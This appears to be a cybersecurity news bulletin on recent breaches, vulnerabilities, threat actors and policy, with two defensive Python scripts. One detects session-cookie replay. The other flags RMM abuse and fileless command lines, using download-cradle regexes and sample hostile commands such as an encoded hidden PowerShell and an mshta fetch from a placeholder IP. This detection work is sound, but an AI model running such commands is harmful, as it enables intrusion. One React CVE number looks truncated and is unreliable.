Major Incidents or Breaches

  • Cloudflare mitigated a record-breaking 29.7 Tbps distributed denial-of-service (DDoS) attack attributed to the Aisuru botnet, which leveraged up to 4 million infected hosts and launched over 1,300 attacks in three months.
  • Marquis Software Solutions reported a data breach impacting over 74 US banks and credit unions.
  • French retailer Leroy Merlin disclosed a data breach that compromised customer personal data in France.
  • Freedom Mobile, a major Canadian wireless carrier, suffered a breach exposing customer data after attackers accessed its customer account management platform.
  • The University of Phoenix and the University of Pennsylvania confirmed data breaches linked to the exploitation of vulnerable Oracle E-Business Suite instances in a campaign attributed to the Clop ransomware group.
  • WordPress sites using the King Addons for Elementor plugin are being actively compromised via exploitation of a critical vulnerability (CVE-2025-8489), allowing attackers to create admin accounts and take over sites.

Newly Discovered Vulnerabilities

  • Critical vulnerabilities in React Server Components (RSC), tracked as CVE-2025-5518 and a second CVE, allow unauthenticated remote code execution; by one estimate more than a third of cloud environments run affected code.
  • The King Addons for Elementor WordPress plugin (CVE-2025-8489, CVSS 9.8) is under active attack, enabling privilege escalation to administrative permissions.
  • Microsoft silently patched a high-severity Windows LNK vulnerability that has been exploited by multiple state-backed and cybercrime groups as a zero-day since 2017. The November 2025 Patch Tuesday update addressed the issue, and Windows now displays additional LNK file properties to help identify malicious code.
  • Three critical vulnerabilities were disclosed in Picklescan, an open-source utility for scanning PyTorch models. These flaws allow malicious PyTorch models to evade scans and execute arbitrary code.
  • Chrome 143 stable release addressed 13 vulnerabilities, including a high-severity flaw in the V8 JavaScript engine.

Notable Threat Actor Activity

  • Kaspersky identified Shai Hulud 2.0, a new version of the npm worm now equipped with wiper functionality, targeting organizations in Russia, India, Brazil, China, and other countries.
  • The Water Saci threat actor has evolved its banking trojan campaign in Brazil, now using a multi-layered infection chain built from HTA files and PDFs, propagating through WhatsApp, and carrying a RelayNFC component for NFC relay fraud. AI-enhanced Python variants are targeting enterprise users of banks and cryptocurrency exchanges.
  • The MuddyWater APT (linked to Iran) targeted Israeli organizations using new evasion tactics, including techniques mimicking the retro Snake mobile game.
  • The ShadyPanda group, believed to be China-based, has been using malicious Chrome and Edge browser extensions to spy on millions of users globally.
  • A malicious Rust crate was discovered targeting Web3 developer systems across Windows, macOS, and Linux, capable of OS-specific malware delivery and stealthy execution.
  • DragonForce ransomware, in collaboration with the Scattered Spider group, has expanded operations in 2025, leveraging advanced social engineering and initial access techniques.
  • Attackers are increasingly using Evilginx, an adversary-in-the-middle reverse proxy, to capture session cookies after a victim completes multi-factor authentication (MFA); replaying the cookie gives the attacker the authenticated session without triggering a second MFA prompt.
  • There is a rise in attackers abusing legitimate Remote Monitoring and Management (RMM) tools to gain remote control of victim systems.
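The Evilginx item above describes a pattern defenders can look for in identity-provider telemetry: the MFA-satisfied sign-in arrives from the proxy's address, and the same session is then used from a second IP and user agent minutes later. The script below is an added example, not code from the bulletin or from the Evilginx project; its JSON-lines log schema, the sample events, and the hosting-provider address range are constructed placeholders, so map the field names onto your own sign-in export and feed the range list from real ASN or cloud-provider data.

```python
"""Flag adversary-in-the-middle session-cookie replay in sign-in telemetry.

Added example (not from the original bulletin or the Evilginx project).
An Evilginx-style proxy sits between victim and identity provider: the
victim completes MFA through the proxy, the proxy captures the resulting
session cookie, and the attacker replays it from a different host. Two
signals follow: the MFA-satisfied sign-in itself comes from the proxy's
address (often a hosting provider), and the same session is used from a
second IP and user agent shortly afterwards. The log schema, sample events
and hosting ranges below are constructed for this example.
"""
import ipaddress
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed JSON-lines sample. s1 is the compromised session: MFA completed
# via a proxy on 203.0.113.10, cookie replayed 3.5 minutes later from 198.51.100.77.
SAMPLE_LOG = """\
{"ts": "2025-12-01T09:00:12Z", "user": "alice@example.org", "event": "interactive_signin", "session": "s1", "ip": "203.0.113.10", "mfa": "satisfied", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/131"}
{"ts": "2025-12-01T09:03:40Z", "user": "alice@example.org", "event": "session_use", "session": "s1", "ip": "198.51.100.77", "mfa": "cookie", "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/133"}
{"ts": "2025-12-01T09:30:00Z", "user": "bob@example.org", "event": "interactive_signin", "session": "s2", "ip": "192.0.2.5", "mfa": "satisfied", "ua": "Mozilla/5.0 (Macintosh) Safari/605"}
{"ts": "2025-12-01T10:10:00Z", "user": "bob@example.org", "event": "session_use", "session": "s2", "ip": "192.0.2.5", "mfa": "cookie", "ua": "Mozilla/5.0 (Macintosh) Safari/605"}
"""

# Constructed placeholder for hosting/VPS address space (TEST-NET-3 here);
# in practice populate this from ASN or cloud-provider range data.
HOSTING_RANGES = [ipaddress.ip_network("203.0.113.0/24")]


def parse_log(text):
    """Parse JSON-lines sign-in events; normalise timestamps and IPs."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        e["ip"] = ipaddress.ip_address(e["ip"])
        events.append(e)
    return events


def is_hosting_ip(ip):
    """True when the address falls inside a known hosting/VPS range."""
    return any(ip in net for net in HOSTING_RANGES)


def detect_session_replay(events, window=timedelta(hours=1)):
    """Return one alert per session whose cookie is used from a different IP
    or user agent within `window` of the MFA-satisfied sign-in that minted it.

    Severity is 'high' when both IP and user agent change or when the
    originating sign-in came from a hosting range; 'medium' when only the IP
    changes (mobile carriers rotate addresses, so that alone is weaker)."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session"]].append(e)

    alerts = []
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])
        origin = next((e for e in evs if e["event"] == "interactive_signin"
                       and e["mfa"] == "satisfied"), None)
        if origin is None:
            continue
        for e in evs:
            if e is origin or e["ts"] < origin["ts"] or e["ts"] - origin["ts"] > window:
                continue
            ip_changed = e["ip"] != origin["ip"]
            ua_changed = e["ua"] != origin["ua"]
            if not (ip_changed or ua_changed):
                continue
            proxied = is_hosting_ip(origin["ip"])
            severity = "high" if (ip_changed and ua_changed) or proxied else "medium"
            alerts.append({
                "session": sid,
                "user": e["user"],
                "severity": severity,
                "signin_ip": str(origin["ip"]),
                "replay_ip": str(e["ip"]),
                "minutes_after_mfa": round((e["ts"] - origin["ts"]).total_seconds() / 60, 1),
                "signin_from_hosting_range": proxied,
            })
            break  # one alert per session is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_session_replay(parse_log(SAMPLE_LOG)):
        print(alert)
```

Running the block prints a single high-severity alert for session s1. Session s2 stays quiet because bob's cookie is reused from the same IP and browser that performed the MFA sign-in. The window defaults to one hour because stolen cookies are typically replayed within minutes of capture; widen it if your provider issues long-lived refresh tokens, and treat the hosting-range check as the stronger of the two signals when the sign-in provider reports device compliance for the same session.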

Trends, Tools, or Tactics of Interest

  • The Aisuru botnet’s scale and DDoS throughput set new records, highlighting the growing potency of botnet-driven attacks.
  • Matrix Push C2, a new criminal toolkit, is abusing browser push notifications to launch social engineering attacks.
  • Use of AI tools is fueling more sophisticated cybercrime, lowering barriers for less-skilled actors and enhancing the quality of phishing and malware campaigns.
  • Attackers are increasingly targeting enterprises during off-hours, weekends, and holidays, exploiting reduced staffing and slower response times.
  • Content Delivery Networks (CDNs) remain a primary mitigation for DDoS and aggressive bot traffic, but attackers are attempting to bypass these protections.
  • Fileless attack techniques and abuse of legitimate IT tools are increasingly observed, complicating detection and response for defenders.
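Three items in this bulletin share one detection surface: abuse of legitimate RMM tools (under Notable Threat Actor Activity), off-hours execution, and fileless LOLBin techniques. The script below is an added example, not code from the bulletin or any vendor, showing how a triage rule can combine them over process-creation events: an RMM binary outside its approved install path or a LOLBin command pattern is the primary finding, and an Office parent process or an off-hours timestamp raises the score rather than firing on its own. The event schema, sample events, approved-RMM list, and business-hours window are constructed; map them onto your EDR or Sysmon Event ID 1 fields.

```python
"""Score process-creation events for RMM-tool abuse and fileless/LOLBin
patterns, with modifiers for Office parents and off-hours execution.

Added example (not from the original bulletin or any vendor). The event
schema, sample events, approved-RMM policy and business hours are
constructed for this example.
"""
import re
from datetime import datetime, time

# Constructed policy: RMM binaries we know about, and the one install path
# that is approved. Anything else running an RMM client is a finding.
RMM_BINARIES = {"anydesk.exe", "teamviewer.exe", "rustdesk.exe",
                "ateraagent.exe", "screenconnect.clientservice.exe"}
APPROVED_RMM = {"screenconnect.clientservice.exe": r"c:\program files (x86)\screenconnect client"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
BUSINESS_START, BUSINESS_END = time(8, 0), time(18, 0)

# Command-line patterns for common fileless / living-off-the-land abuse.
LOLBIN_PATTERNS = [
    ("powershell encoded command", re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("powershell download cradle", re.compile(r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b).*https?://", re.I)),
    ("mshta remote or inline script", re.compile(r"mshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)", re.I)),
    ("regsvr32 remote scriptlet", re.compile(r"regsvr32(?:\.exe)?\b.*/i:https?://", re.I)),
    ("rundll32 javascript", re.compile(r"rundll32(?:\.exe)?\b.*javascript:", re.I)),
    ("certutil download", re.compile(r"certutil(?:\.exe)?\b.*-urlcache", re.I)),
]

# Constructed sample events (local time). 2025-11-29 is a Saturday.
SAMPLE_EVENTS = [
    {"ts": "2025-11-29T02:14:05", "host": "WS-12", "parent": "outlook.exe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\AnyDesk.exe", "cmdline": "AnyDesk.exe --silent"},
    {"ts": "2025-12-01T10:05:00", "host": "SRV-01", "parent": "services.exe",
     "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "cmdline": "ScreenConnect.ClientService.exe"},
    {"ts": "2025-12-01T23:40:11", "host": "WS-07", "parent": "winword.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": "2025-12-01T14:20:00", "host": "WS-03", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe http://198.51.100.20/x.hta"},
    {"ts": "2025-12-02T09:30:00", "host": "WS-09", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def is_off_hours(ts):
    """Weekend, or outside the constructed 08:00-18:00 business window."""
    return ts.weekday() >= 5 or not (BUSINESS_START <= ts.time() < BUSINESS_END)


def rmm_finding(image):
    """Name the RMM binary if it runs from anywhere but its approved path."""
    name = image.rsplit("\\", 1)[-1].lower()
    if name not in RMM_BINARIES:
        return None
    approved = APPROVED_RMM.get(name)
    if approved and image.lower().startswith(approved):
        return None
    return f"RMM binary {name} outside approved install path"


def lolbin_findings(cmdline):
    return [label for label, rx in LOLBIN_PATTERNS if rx.search(cmdline)]


def score_event(event):
    """Primary findings score 2 each; Office parent and off-hours add 1 each
    but only when a primary finding exists, so they never alert alone."""
    ts = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%S")
    reasons, points = [], 0
    finding = rmm_finding(event["image"])
    if finding:
        reasons.append(finding)
        points += 2
    for label in lolbin_findings(event["cmdline"]):
        reasons.append(label)
        points += 2
    if points:
        if event["parent"].lower() in OFFICE_PARENTS:
            reasons.append(f"spawned by Office process {event['parent']}")
            points += 1
        if is_off_hours(ts):
            reasons.append("off-hours execution")
            points += 1
    severity = "high" if points >= 3 else "medium" if points == 2 else "none"
    return {"host": event["host"], "severity": severity, "points": points, "reasons": reasons}


def triage(events):
    """Scored events that produced at least one primary finding."""
    return [s for s in map(score_event, events) if s["severity"] != "none"]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

On the sample, WS-12 (AnyDesk dropped into a Temp folder by Outlook on a Saturday night) and WS-07 (encoded PowerShell spawned by Word at 23:40) both score high; the mshta download during business hours on WS-03 is medium; the approved ScreenConnect service on SRV-01 and the plain cmd.exe on WS-09 produce nothing. The approved-path check is the part worth tuning: an RMM agent your helpdesk legitimately deploys should be listed with its installer's real path, and any instance that appears under a user profile, a Temp directory, or a renamed binary should be treated as unsanctioned.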

Regulatory or Policy Developments

  • The Arizona Attorney General has filed a lawsuit against Chinese online retailer Temu, alleging unauthorized and undisclosed access to and harvesting of user data through its mobile application.
  • CISA and partners released a new joint guide focused on the secure integration of artificial intelligence in operational technology environments.
  • Google is expanding Android’s in-call scam protection for financial applications in the US, aiming to address rising phone-based fraud.
  • Russia has blocked access to the Roblox gaming platform, citing the distribution of LGBT-related content and extremist material as justification.